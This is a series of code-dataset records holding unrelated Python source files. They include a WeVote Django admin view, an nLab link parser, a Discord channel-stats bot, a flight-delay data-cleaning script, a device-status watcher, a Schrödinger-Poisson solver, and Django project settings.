'twitter_profile_background_image_url_https',\n 'twitter_profile_banner_url_https',\n 'twitter_user_id',\n 'vote_smart_id',\n 'vote_usa_politician_id',\n 'vote_usa_profile_image_url_https',\n 'washington_post_id',\n 'we_vote_hosted_profile_facebook_image_url_large',\n 'we_vote_hosted_profile_facebook_image_url_medium',\n 'we_vote_hosted_profile_facebook_image_url_tiny',\n 'we_vote_hosted_profile_image_url_large',\n 'we_vote_hosted_profile_image_url_medium',\n 'we_vote_hosted_profile_image_url_tiny',\n 'we_vote_hosted_profile_twitter_image_url_large',\n 'we_vote_hosted_profile_twitter_image_url_medium',\n 'we_vote_hosted_profile_twitter_image_url_tiny',\n 'we_vote_hosted_profile_uploaded_image_url_large',\n 'we_vote_hosted_profile_uploaded_image_url_medium',\n 'we_vote_hosted_profile_uploaded_image_url_tiny',\n 'we_vote_hosted_profile_vote_usa_image_url_large',\n 'we_vote_hosted_profile_vote_usa_image_url_medium',\n 'we_vote_hosted_profile_vote_usa_image_url_tiny',\n 'wikipedia_id',\n 'wikipedia_url',\n 'youtube_url')\n if politician_query:\n modified_politician_dict_list = []\n politician_dict_list = list(politician_query)\n for one_dict in politician_dict_list:\n birth_date = one_dict.get('birth_date', '')\n if positive_value_exists(birth_date):\n one_dict['birth_date'] = birth_date.strftime('%Y-%m-%d')\n date_last_updated = one_dict.get('date_last_updated', '')\n if positive_value_exists(date_last_updated):\n one_dict['date_last_updated'] = date_last_updated.strftime('%Y-%m-%d %H:%M:%S')\n date_last_updated_from_candidate = one_dict.get('date_last_updated_from_candidate', '')\n if positive_value_exists(date_last_updated_from_candidate):\n one_dict['date_last_updated_from_candidate'] = \\\n date_last_updated_from_candidate.strftime('%Y-%m-%d %H:%M:%S')\n seo_friendly_path_date_last_updated = one_dict.get('seo_friendly_path_date_last_updated', '')\n if positive_value_exists(seo_friendly_path_date_last_updated):\n one_dict['seo_friendly_path_date_last_updated'] = \\\n seo_friendly_path_date_last_updated.strftime('%Y-%m-%d %H:%M:%S')\n modified_politician_dict_list.append(one_dict)\n politician_list_json = list(modified_politician_dict_list)\n return HttpResponse(json.dumps(politician_list_json), content_type='application/json')\n except Exception as e:\n status += \"POLITICIAN_LIST_MISSING: \" + str(e) + \" \"\n\n json_data = {\n 'success': False,\n 'status': status\n }\n return HttpResponse(json.dumps(json_data), content_type='application/json')\n\n\n@login_required\ndef update_politician_from_candidate_view(request):\n candidate_we_vote_id = request.GET.get('candidate_we_vote_id', '')\n politician_id = request.GET.get('politician_id', 0)\n politician_we_vote_id = request.GET.get('politician_we_vote_id', '')\n if not positive_value_exists(politician_id) and not positive_value_exists(politician_we_vote_id):\n message = \"Unable to update politician from candidate. Missing politician_id and we_vote_id.\"\n messages.add_message(request, messages.INFO, message)\n return HttpResponseRedirect(reverse('politician:politician_list', args=()))\n\n if positive_value_exists(politician_we_vote_id):\n politician = Politician.objects.get(we_vote_id=politician_we_vote_id)\n else:\n politician = Politician.objects.get(id=politician_id)\n politician_id = politician.id\n politician_we_vote_id = politician.we_vote_id\n\n queryset = CandidateCampaign.objects.using('readonly').all()\n queryset = queryset.filter(politician_we_vote_id__iexact=politician_we_vote_id)\n if positive_value_exists(candidate_we_vote_id):\n queryset = queryset.filter(we_vote_id__iexact=candidate_we_vote_id)\n queryset = queryset.order_by('-candidate_year', '-candidate_ultimate_election_date')\n candidate_list = list(queryset)\n candidate_list_by_politician_we_vote_id = {}\n for one_candidate in candidate_list:\n # Only put the first one in\n if one_candidate.politician_we_vote_id not in candidate_list_by_politician_we_vote_id:\n candidate_list_by_politician_we_vote_id[one_candidate.politician_we_vote_id] = one_candidate\n\n if politician.we_vote_id in candidate_list_by_politician_we_vote_id:\n candidate = candidate_list_by_politician_we_vote_id[politician.we_vote_id]\n results = update_politician_details_from_candidate(politician=politician, candidate=candidate)\n if results['success']:\n save_changes = results['save_changes']\n politician = results['politician']\n if save_changes:\n politician.date_last_updated_from_candidate = localtime(now()).date()\n politician.save()\n message = \"Politician updated.\"\n messages.add_message(request, messages.INFO, message)\n else:\n message = \"Politician not updated. No changes found.\"\n messages.add_message(request, messages.INFO, message)\n else:\n message = \"Politician not updated. Error: \" + str(results['status'])\n messages.add_message(request, messages.INFO, message)\n else:\n message = \"Politician not updated. No candidates found to update politician from.\"\n messages.add_message(request, messages.INFO, message)\n\n return HttpResponseRedirect(reverse('politician:politician_edit', args=(politician_id,)))\n\n\n@login_required\ndef update_politicians_from_candidates_view(request):\n # admin, analytics_admin, partner_organization, political_data_manager, political_data_viewer, verified_volunteer\n authority_required = {'verified_volunteer'}\n if not voter_has_authority(request, authority_required):\n return redirect_to_sign_in_page(request, authority_required)\n\n status = \"\"\n success = True\n state_code = request.GET.get('state_code', \"\")\n\n politician_list = []\n try:\n queryset = Politician.objects.all()\n if positive_value_exists(state_code):\n queryset = queryset.filter(state_code__iexact=state_code)\n # Ignore politicians who have been updated in the last 6 months: date_last_updated_from_politician\n today = datetime.now().date()\n six_months = timedelta(weeks=26)\n six_months_ago = today - six_months\n queryset = queryset.exclude(date_last_updated_from_candidate__gt=six_months_ago)\n politician_list = list(queryset[:3000])\n except Exception as e:\n status += \"REPRESENTATIVE_QUERY_FAILED: \" + str(e) + \" \"\n\n # Retrieve all related candidates with one query\n politician_we_vote_id_list = []\n for politician in politician_list:\n if positive_value_exists(politician.we_vote_id):\n if politician.we_vote_id not in politician_we_vote_id_list:\n politician_we_vote_id_list.append(politician.we_vote_id)\n\n candidate_list_by_politician_we_vote_id = {}\n if len(politician_we_vote_id_list) > 0:\n queryset = CandidateCampaign.objects.all()\n queryset = queryset.filter(politician_we_vote_id__in=politician_we_vote_id_list)\n queryset = queryset.order_by('-candidate_year', '-candidate_ultimate_election_date')\n candidate_list = list(queryset)\n for one_candidate in candidate_list:\n # Only put the first one in\n if one_candidate.politician_we_vote_id not in candidate_list_by_politician_we_vote_id:\n candidate_list_by_politician_we_vote_id[one_candidate.politician_we_vote_id] = one_candidate\n\n # Loop through all the politicians in this year, and update them with some politician data\n politician_update_errors = 0\n politicians_updated = 0\n politicians_without_changes = 0\n for we_vote_politician in politician_list:\n if we_vote_politician.we_vote_id in candidate_list_by_politician_we_vote_id:\n candidate = candidate_list_by_politician_we_vote_id[we_vote_politician.we_vote_id]\n else:\n candidate = None\n we_vote_politician.date_last_updated_from_candidate = localtime(now()).date()\n we_vote_politician.save()\n if not candidate or not hasattr(candidate, 'we_vote_id'):\n continue\n results = update_politician_details_from_candidate(politician=we_vote_politician, candidate=candidate)\n if results['success']:\n save_changes = results['save_changes']\n we_vote_politician = results['politician']\n we_vote_politician.date_last_updated_from_candidate = localtime(now()).date()\n we_vote_politician.save()\n if save_changes:\n politicians_updated += 1\n else:\n politicians_without_changes += 1\n else:\n politician_update_errors += 1\n status += results['status']\n\n message = \\\n \"Politicians updated: {politicians_updated:,}. \" \\\n \"Politicians without changes: {politicians_without_changes:,}. \" \\\n \"Politician update errors: {politician_update_errors:,}. \" \\\n \"\".format(\n politician_update_errors=politician_update_errors,\n politicians_updated=politicians_updated,\n politicians_without_changes=politicians_without_changes)\n\n messages.add_message(request, messages.INFO, message)\n\n return HttpResponseRedirect(reverse('politician:politician_list', args=()) +\n \"?state_code={state_code}\"\n \"\".format(\n state_code=state_code))\n","repo_name":"wevote/WeVoteServer","sub_path":"politician/views_admin.py","file_name":"views_admin.py","file_ext":"py","file_size_in_byte":157825,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"70"}
+{"seq_id":"40144582638","text":"#!/usr/bin/env python3\n\n\"\"\"\nLibrary for parsing external links\n\"\"\"\n\nimport find_block\n\nclass ExternalLinkException(Exception):\n pass\n\ndef external_link_block_processor(link):\n split_link = link.split(\"](\", 1)\n if len(split_link) == 0:\n return link\n link_text = split_link[0]\n link_url = split_link[1]\n if not (\n \"#\" in link_url or \\\n link_url.startswith(\"https\") or \\\n link_url.startswith(\"http\")):\n raise ExternalLinkException\n return (\n \"\" +\n link_text +\n \" \")\n\ndef define():\n return find_block.Block(\n \"[\",\n \")\",\n external_link_block_processor,\n True)\n\n","repo_name":"ncatlab/nlab","sub_path":"script/src/renderer/external_link_block.py","file_name":"external_link_block.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":111,"dataset":"github-code","pt":"70"}
+{"seq_id":"18230895837","text":"from __future__ import absolute_import, print_function, division\nfrom nose.plugins.skip import SkipTest\n\nimport theano.sandbox.gpuarray\n\nif theano.sandbox.gpuarray.pygpu is None:\n raise SkipTest(\"pygpu not installed\")\n\nif (not theano.sandbox.gpuarray.pygpu_activated and\n not theano.config.init_gpu_device.startswith('gpu')):\n theano.sandbox.gpuarray.init_dev('cuda')\n\nif not theano.sandbox.gpuarray.pygpu_activated:\n raise SkipTest(\"pygpu disabled\")\n\ntest_ctx_name = None\n\nif theano.config.mode == 'FAST_COMPILE':\n mode_with_gpu = theano.compile.mode.get_mode('FAST_RUN').including('gpuarray').excluding('gpu')\n mode_without_gpu = theano.compile.mode.get_mode('FAST_RUN').excluding('gpuarray')\nelse:\n mode_with_gpu = theano.compile.mode.get_default_mode().including('gpuarray').excluding('gpu')\n mode_without_gpu = theano.compile.mode.get_default_mode().excluding('gpuarray')\n","repo_name":"mkusner/grammarVAE","sub_path":"Theano-master/theano/sandbox/gpuarray/tests/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":257,"dataset":"github-code","pt":"70"}
+{"seq_id":"74101087907","text":"import logging\n\nimport datetime\nimport discord.guild\nimport utils.messages as messages\n\nfrom stats.models import TopChannels, ChannelMessagesCountInfo\n\n\nasync def get_top_channels_text(current_guild_getter, days, limit=10):\n top_channels = await _get_top_channels_info(\n current_guild_getter,\n datetime.datetime.utcnow() - datetime.timedelta(days=days),\n limit\n )\n return messages.make_top_channels_message(top_channels)\n\n\nasync def _get_top_channels_info(current_guild_getter, after: datetime.datetime, limit):\n guild = current_guild_getter()\n text_channels = _get_all_text_channels(guild)\n channels_info = []\n\n for channel in text_channels:\n messages_count = await _get_messages_count(channel, after)\n if messages_count > 0:\n info = ChannelMessagesCountInfo(channel, messages_count)\n channels_info.append(info)\n\n channels_info.sort(key=lambda x: x.messages_count, reverse=True)\n channels_info = channels_info[:limit]\n return TopChannels(channels_info, after)\n\n\ndef _get_all_text_channels(guild: discord.guild):\n text_channel_list = []\n for channel in guild.channels:\n if str(channel.type) == 'text':\n text_channel_list.append(channel)\n return text_channel_list\n\n\nasync def _get_messages_count(channel: discord.channel, after: datetime.datetime):\n messages = await channel.history(after=after).flatten()\n return len(messages)\n","repo_name":"panandafog/stats-bot","sub_path":"stats/text_channels.py","file_name":"text_channels.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"12675661172","text":"import pandas as pd\nimport numpy as np\nfrom datetime import datetime\nimport time\nimport matplotlib.pyplot as plt\n\ndef convert_dur(x,y):\n\tif (math.isnan(x) == 1) or (math.isnan(y) == 1):\n\t\treturn np.nan \n\telse:\n\t\treturn datetime.fromtimestamp(y)-datetime.fromtimestamp(x)\n\t\nweather = pd.read_csv(\"2015年5月到2017年5月城市天气.csv\",header=0)\n#action = pd.read_csv(\"2015年5月到2017年5月航班动态数据.txt\",sep=',',header=0)\n#action = pd.read_csv(\"action.csv\",header=0)\naction = pd.read_csv(\"action_2.csv\",header=0)\ncities = pd.read_csv(\"机场城市对应表.csv\",header=0)\nspecial = pd.read_csv(\"2015年5月到2017年5月特情.csv\",header=0)\nsubmission_sample = pd.read_csv(\"submission_sample.csv\",header=0)\n\nweather.columns = ['city','weather','lowtemp','hightemp','date']\n#action.columns = ['dep_port','arr_port','airline','planned_deptime','planned_arrtime','real_deptime','real_arrtime','plane_id','canceled_or_not']\n#mapping = {'正常': 1, '取消': 0}\n#action = action.replace({'canceled_or_not':mapping})\ncities.columns = ['airport','city']\nspecial.columns = ['airport','collect_time','start_time','end_time','content']\n\n# action---------------------\n#action = action.drop_duplicates()\n#\n# the month need to predict is June, and the weather is highly dependent on month in a year, so extract 15th,May ~ 15th,July of 2015 and 2016 historical data only\n'''\nstart_ts1 = int(time.mktime([2015,5,15,0,0,0,0,0,0]))\nend_ts1 = int(time.mktime([2015,7,15,0,0,0,0,0,0]))\nstart_ts2 = int(time.mktime([2016,5,15,0,0,0,0,0,0]))\nend_ts2 = int(time.mktime([2016,7,15,0,0,0,0,0,0]))\nstart_ts3 = int(time.mktime([2017,5,15,0,0,0,0,0,0]))\nend_ts3 = int(time.mktime([2017,7,15,0,0,0,0,0,0]))\nlaction = ((action['planned_deptime'] > start_ts1) & (action['planned_deptime'] < end_ts1)) | ((action['planned_deptime'] > start_ts2) & (action['planned_deptime'] < end_ts2)) | ((action['planned_deptime'] > start_ts3) & (action['planned_deptime'] < end_ts3))\naction = action[laction]\naction = action.drop_duplicates()\naction = action.reset_index(drop=True)\naction.to_csv(\"action_2.csv\",index=False)\n'''\n\n# number of nan in action\n'''action.isnull().sum()\nreal_deptime 71486\nreal_arrtime 71280\nplane_id 32024\nothers \t\t 0\nlen(action) = 1325127\n71486/1325127.0 = 5.4%\nQ: thoes are canceled?\nlen(action[action.canceled_or_not==0]) -- 71302\nlen(action[action.canceled_or_not==0 & action.real_deptime.isnull()]) --- 71302\nA: roughly, lines where real_deptime is null are all canceled\nlen(action[action.canceled_or_not==1 & action.real_deptime.isnull()]) ----564\nA: some that have no time information are not canceled \n'''\n# norm_dur : norm duration = planned_arrtime - planned_deptime\n# real_dur = real_arrtime - planned_deptime <--!!!!!!\n# type of duration: datetime.timedelta .days, .seconds\naction['norm_dur'] = map(lambda x,y: datetime.fromtimestamp(y)-datetime.fromtimestamp(x),action['planned_deptime'],action['planned_arrtime'])\naction['delay'] = map(convert_dur,action['planned_arrtime'],action['real_arrtime'])\naction['real_dur'] = map(convert_dur,action['real_deptime'],action['real_arrtime'])\n# abnormal records: len(action[action.planned_deptime == action.planned_arrtime])/float(len(action)) 1%\n# planned_deptime == planned_arrtime\naction = action[action.planned_deptime != action.planned_arrtime]\n# depart before planned dep time (20min before)---see as abnormal ---0.04%\naction['plan-real_deptime'] = map(convert_dur,action['real_deptime'],action['planned_deptime'])\naction = action[~(action['plan-real_deptime'] > pd.Timedelta('0 days 00:20:00'))]\n# in action history, the percentage of delaying longer than 3 hours:\n# len(action[action.delay > pd.Timedelta('0 days 03:00:00')])/float(len(action)) ----- 3.6%; 3h10m: 3.27%; 3h20m: 2.94%\n# > 4 hours: 1.98%; > 5 hours: 1.1%; > 6 hours: 0.6%;------ > 2 hours: 7%; > 1 hour: 14.9%; > 30 min: 23.6%\n# len(action[action.canceled_or_not == 0])/float(len(action)) ----- 5.2% flights are canceled\n# len(set(submission_sample.Flightno)- set(action.airline)) -- 790 out of 144396 new airlines that does not appear in action history\n# compare with pd.Timedelta('0 days 03:00:00'), consider prop, maybe set different weights \n\n# split first two chars of airline\n\n#---------------------------------\n# extract the special data\nstart1 = '2015-05-15 00:00:00Z'\nend1 = '2015-07-15 00:00:00Z'\nstart2 = '2016-05-15 00:00:00Z'\nend2 = '2016-07-15 00:00:00Z'\nstart3 = '2017-05-15 00:00:00Z'\nend3 = '2017-07-15 00:00:00Z'\nlspecial = ((special['collect_time'] > start1) & (special['collect_time'] < end1)) | ((special['collect_time'] > start2) & (special['collect_time'] < end2)) | ((special['collect_time'] > start3) & (special['collect_time'] < end3))\nspecial = special[lspecial]\nspecial = special.reset_index()\n# three hours = 60*3*60 = 10800 seconds\n#(datetime.fromtimestamp(1463357100) - datetime.fromtimestamp(1463352000)).seconds\n#(datetime.fromtimestamp(1463357100) - datetime.fromtimestamp(1463352000)).days\n\n#---------submission sample\nsubmission_sample['norm_dur'] = map(lambda x,y: datetime.fromtimestamp(y)-datetime.fromtimestamp(x),submission_sample['PlannedDeptime'],submission_sample['PlannedArrtime'])\n","repo_name":"yuand23/contests","sub_path":"CTRIP_airline_delay_prediction/cleaning.py","file_name":"cleaning.py","file_ext":"py","file_size_in_byte":5183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"10739880593","text":"#!/usr/bin/env python3\n\nimport psycopg2\nimport signal\nimport pycx4.qcda as cda\n\nfrom aux.service_daemon import QtService\nfrom .device import Dev\n\nsignal.signal(signal.SIGINT, signal.SIG_DFL)\n\n\nclass IcWatcher:\n \"\"\"\n watching for DR elements status\n \"\"\"\n def __init__(self):\n super(IcWatcher, self).__init__()\n try:\n self.conn = psycopg2.connect(dbname='icdata', user='postgres', host='pg10-srv', password='')\n print(\"Connected to DB\")\n except:\n print(\"No access to DB\")\n\n self.sys_info_d = {'logs': cda.StrChan('cxhw:1.ic_watcher.logs', max_nelems=1024, on_update=1),\n 'ofr': cda.StrChan('cxhw:1.ic_watcher.ofr', max_nelems=1024, on_update=1)}\n self.ofr_list = []\n\n self.dev_chans_list = []\n\n self.conditions_um4 = [{'func': 'curr_state', 'chans': ['Iset', 'Imes'], 'wait_time': 3000, 'up_lim': 8000,\n 'down_lim': 200, 'err_code': 'I_mes_problem'},\n {'func': 'range_state', 'chans': ['Umes'], 'up_lim': 13, 'down_lim': 0,\n 'err_code': 'U_out_of_range'}]\n self.conditions_vs = [{'func': 'range_state', 'chans': ['Imes'], 'up_lim': 256, 'down_lim': 0,\n 'err_code': 'I_out_of_range'},\n {'func': 'range_state', 'chans': ['Umes'], 'up_lim': 7, 'down_lim': 2,\n 'err_code': 'U_out_of_range'}]\n self.conditions_um15 = [{'func': 'curr_state', 'chans': ['Iset', 'Imes'], 'wait_time': 3000, 'up_lim': 8000,\n 'down_lim': 200, 'err_code': 'I_mes_problem'}]\n self.conditions_vch300 = [{'func': 'curr_state', 'chans': ['Iset', 'Imes'], 'wait_time': 3000, 'up_lim': 1000,\n 'down_lim': 0, 'err_code': 'I_mes_problem'}]\n self.conditions_v300 = [{'func': 'curr_state', 'chans': ['Iset', 'Imes'], 'wait_time': 3000, 'up_lim': 1000,\n 'down_lim': 0, 'err_code': 'I_mes_problem'}]\n self.conditions_pa10 = [{'func': 'curr_state', 'chans': ['Iset', 'Imes'], 'wait_time': 3000, 'up_lim': 1000,\n 'down_lim': 0, 'err_code': 'I_mes_problem'},\n {'func': 'range_state', 'chans': ['Umes'], 'up_lim': 13, 'down_lim': 0,\n 'err_code': 'U_out_of_range'}]\n self.conditions_vch1000 = [\n {'func': 'curr_state', 'chans': ['Iset', 'dcct1'], 'wait_time': 3000, 'up_lim': 5000,\n 'down_lim': 0, 'err_code': 'I_mes_problem'},\n {'func': 'is_on', 'chans': ['is_on'], 'err_code': 'PS is off'},\n {'func': 'ilk', 'chans': ['ilk_imax', 'ilk_inverter', 'ilk_out_prot1',\n 'ilk_out_prot2', 'ilk_out_prot3', 'ilk_phase', 'ilk_temp'],\n 'wait_time': 3000, 'err_code': 'Interlock'}]\n self.conditions_ist = [\n {'func': 'curr_state', 'chans': ['Iset', 'dcct1'], 'wait_time': 3000, 'up_lim': 5000,\n 'down_lim': 0, 'err_code': 'I_mes_problem'},\n {'func': 'is_on', 'chans': ['is_on'], 'err_code': 'is_on'},\n {'func': 'ilk', 'chans': ['ilk_imax', 'ilk_umax', 'ilk_out_prot', 'ilk_phase', 'ilk_temp', 'ilk_water',\n 'ilk_battery'], 'wait_time': 3000, 'err_code': 'Interlock'}]\n\n self.conditions_dict = {'UM15': self.conditions_um15, 'UM4': self.conditions_um4, 'vaciva': self.conditions_vs,\n 'vac124': self.conditions_vs, 'vch300': self.conditions_vch300,\n 'v300': self.conditions_v300, 'pa10': self.conditions_pa10,\n 'vch1000': self.conditions_vch1000, 'ist': self.conditions_ist}\n self.state_chans_dict = {'magnet': [], 'ion_pump': []}\n self.choose_state_dict = {'UM15': 'magnet', 'UM4': 'magnet', 'vaciva': 'ion_pump', 'vac124': 'ion_pump',\n 'vch300': 'magnet', 'v300': 'magnet', 'pa10': 'magnet', 'vch1000': 'magnet',\n 'ist': 'magnet'}\n self.chans_dict = {'UM15': [], 'UM4': [], 'vaciva': [], 'vac124': [], 'vch300': [], 'v300': [], 'pa10': [],\n 'vch1000': [], 'ist': []}\n self.devnames_dict = {'UM15': [], 'UM4': [], 'vaciva': [], 'vac124': [], 'vch300': [], 'v300': [], 'pa10': [],\n 'vch1000': [], 'ist': []}\n\n self.cur = self.conn.cursor()\n self.cur.execute(\"select devtype.name, chan.name from chan,devtype_chans,devtype \"\n \"where chan.id=devtype_chans.chan_id and devtype.id=devtype_chans.devtype_id and \"\n \"devtype.name in ('magnet', 'ion_pump') group by grouping sets((devtype.name, chan.name))\")\n for elem in self.cur.fetchall():\n self.state_chans_dict[elem[0]].append(elem[1])\n print('state_chans_dict', self.state_chans_dict)\n\n self.cur.execute(\"select devtype.name, chan.name from chan,devtype_chans,devtype \"\n \"where chan.id=devtype_chans.chan_id and devtype.id=devtype_chans.devtype_id and \"\n \"devtype.name in ('UM4', 'UM15', 'vaciva', 'vac124', 'vch300', 'v300', 'pa10', 'vch1000', 'ist') group by grouping sets((devtype.name, chan.name))\")\n # 'UM4', 'UM15', 'vaciva', 'vac124', 'vch300', 'v300', 'pa10', 'vch1000', 'ist'\n for elem in self.cur.fetchall():\n self.chans_dict[elem[0]].append(elem[1])\n print(self.chans_dict)\n\n self.cur.execute(\"select devtype.name, namesys.name || '.' || dev.name as full_name from dev,dev_devtype,devtype, namesys \"\n \"where dev.id=dev_devtype.dev_id and devtype.id=dev_devtype.devtype_id and namesys.id=dev.namesys_id and \"\n \"devtype.name in ('UM4', 'UM15', 'vaciva', 'vac124', 'vch300', 'v300', 'pa10', 'vch1000', 'ist') group by grouping sets((devtype.name, full_name))\")\n for elem in self.cur.fetchall():\n self.devnames_dict[elem[0]].append(elem[1])\n # self.devnames_dict['ist'].append('canhw:11.vit_sim_ist')\n print('devname_dict', self.devnames_dict)\n\n for elem in self.devnames_dict:\n for dname in self.devnames_dict[elem]:\n self.dev_chans_list.append(Dev(dname, self.chans_dict[elem], self.conditions_dict[elem],\n self.state_chans_dict[self.choose_state_dict[elem]],\n self.sys_info_d, self.ofr_list))\n\n\nclass ICWService(QtService):\n def main(self):\n self.w = IcWatcher()\n\n def clean(self):\n self.log_str('exiting from icw')\n\n\nicw_d = ICWService(\"ic_watcher\")\n","repo_name":"vitaliibalakin/ic_watcher","sub_path":"wather_logic/icw.py","file_name":"icw.py","file_ext":"py","file_size_in_byte":6824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"24702400916","text":"#!/usr/bin/env python3\n\"\"\"\nThis code solves the Schrodinger-Poisson system\ncreated: Thu Jan 23 15:00\n@author: mandar\n\"\"\"\n\nimport numpy as np\nimport h5py as hp\nimport os\n\nfrom functions import spectral_calc\n\ndef pot(psi, V, dt, h, m):\n \"\"\"Potential Half-Step\"\"\"\n return np.exp(-1j * m * V * dt / h) * psi\n\ndef kin(psi, k, dt, h, m):\n \"\"\"Kinetic Step\"\"\"\n return np.fft.ifft(np.exp(-1j * (k ** 2) * h * dt / (4 * m)) * np.fft.fft(psi))\n\ndef poisson_fft(psi, k):\n \"\"\"Poisson solver\"\"\"\n H0 = 100\n den = 3 * (H0**2) * ((np.abs(psi) ** 2) - 1) / 2\n V = np.fft.fft(den)\n V[0] = 0\n V[1:] /= -k[1:] ** 2\n return np.fft.ifft(V)\n\ndef phase(nd, k):\n H0 = 100\n V = np.fft.fft(nd)\n V[0] = 0\n V[1:] /= -k[1:] ** 2\n return (np.fft.ifft(V)) * H0\n\ndef time_ev(psi, k, t0, dt, tn, m, h, H0, loc, N_out=100):\n \"\"\"The Propagator\"\"\"\n x = np.arange(0, 2*np.pi, (2*np.pi)/k.size)\n t = t0\n name = 0\n count = 0\n flag = 1\n write_out(loc, name, t, psi)\n\n while flag == 1:\n\n #kinetic half-step; eta increased by Δη/4\n psi = kin(psi, k, dt, h, m)\n t += dt / 4\n V = poisson_fft(psi, k)\n\n #potential half-step; eta increased by Δη/2 (in total by Δη/4 + Δη/2)\n psi = pot(psi, V, dt, h, m)\n t += dt / 2\n\n #kinetic half-step; eta increased by Δη/4 (in total by Δη)\n psi = kin(psi, k, dt, h, m)\n t += dt / 4\n\n count += 1\n if count == N_out:\n name += 1\n flag = write_out(loc, name, t, psi)\n count = 0\n if t > tn:\n flag = 0\n\n print('Solved for t = {}'.format(t))\n print('The last time step was {} \\n'.format(dt))\n print('\\nmean density in the box is = {}'.format(np.mean(np.abs(psi**2) - 1)))\n\n if flag == 0:\n print('Stopping run...')\n write_out(loc, name, t, psi)\n print('Done!')\n\ndef flagger(loc):\n if os.path.exists(str(loc) + 'stop'):\n os.remove(str(loc) + 'stop')\n return 0\n else:\n return 1\n\ndef write_out(loc, name, t, psi):\n print('Writing output file for t = {}'.format(t))\n filename = str(loc) + 'psi_{0:05d}.hdf5'.format(name)\n with hp.File(filename, 'w') as hdf:\n hdf.create_dataset('t', data=t)\n hdf.create_dataset('psi', data=psi)\n flag_loc = flagger(loc)\n if flag_loc == 0:\n return flag_loc\n else:\n return 1\n","repo_name":"mandarmk9/eft_code","sub_path":"non_exp_sch.py","file_name":"non_exp_sch.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"74104350946","text":"# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nimport secure\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = secure.secret_key\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nALLOWED_HOSTS = []\n\nAUTH_USER_MODEL = 'jirello.User'\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'haystack',\n 'debug_toolbar',\n 'jirello',\n 'guardian',\n 'django.contrib.humanize',\n 'django_celery_beat',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'django.middleware.security.SecurityMiddleware',\n 'debug_toolbar.middleware.DebugToolbarMiddleware',\n)\n\nAUTHENTICATION_BACKENDS = (\n 'django.contrib.auth.backends.ModelBackend',\n 'guardian.backends.ObjectPermissionBackend',\n)\n\nLOGIN_URL = '/jirello/login/'\n\nROOT_URLCONF = 'arez_pet.urls'\n\n\nTEMPLATE_PATH = os.path.join(BASE_DIR, 'templates')\n\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [TEMPLATE_PATH],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'arez_pet.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.8/ref/settings/#databases\n\nDATABASES = secure.db_config\n\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.8/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.8/howto/static-files/\nSTATIC_PATH = os.path.join(BASE_DIR, 'static')\nSTATIC_URL = '/static/'\nSTATICFILES_DIRS = (\n STATIC_PATH,\n)\n\nMEDIA_PATH = os.path.join(BASE_DIR, 'media', )\nMEDIA_ROOT = (os.path.join(BASE_DIR, 'media'))\nMEDIA_URL = '/media/'\nMEDIAFILES_DIRS = (\n MEDIA_PATH,\n)\n\nINTERNAL_IPS = secure.internal_ips\n\nGUARDIAN_RAISE_403 = True\n\nGUARDIAN_TEMPLATE_403 = True\n\nUSE_L10N = True\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': True,\n 'formatters': {\n 'simple': {\n 'format': '%(asctime)s %(message)s'\n },\n },\n 'handlers': {\n 'file': {\n 'level': 'DEBUG',\n 'class': 'logging.FileHandler',\n 'filename': os.path.join(BASE_DIR, 'jirello.log'),\n 'formatter': 'simple'},\n },\n 'loggers': {\n 'jirello': {\n 'handlers': ['file'],\n 'level': 'DEBUG',\n 'propagate': True,\n },\n },\n}\n\n# HAYSTACK + ELASTICSEARCH\nHAYSTACK_CONNECTIONS = {\n 'default': {\n 'ENGINE': 'haystack.backends.elasticsearch_backend.ElasticsearchSearchEngine',\n 'URL': 'http://127.0.0.1:9200/',\n 'INDEX_NAME': 'haystack',\n },\n}\nHAYSTACK_SIGNAL_PROCESSOR = 'haystack.signals.RealtimeSignalProcessor'\n\n\n# REDIS + CELERY\n\nCELERY_BROKER_URL = 'redis://localhost:6379/0'\nCELERY_ACCEPT_CONTENT = ['json']\nCELERY_TASK_SERIALIZER = 'json'\nCELERY_RESULT_SERIALIZER = 'json'\nCELERY_TIMEZONE = 'Europe/Kiev'\n\n# EMAIL HOST\n\nEMAIL_USE_TLS = True\nEMAIL_BACKEND = 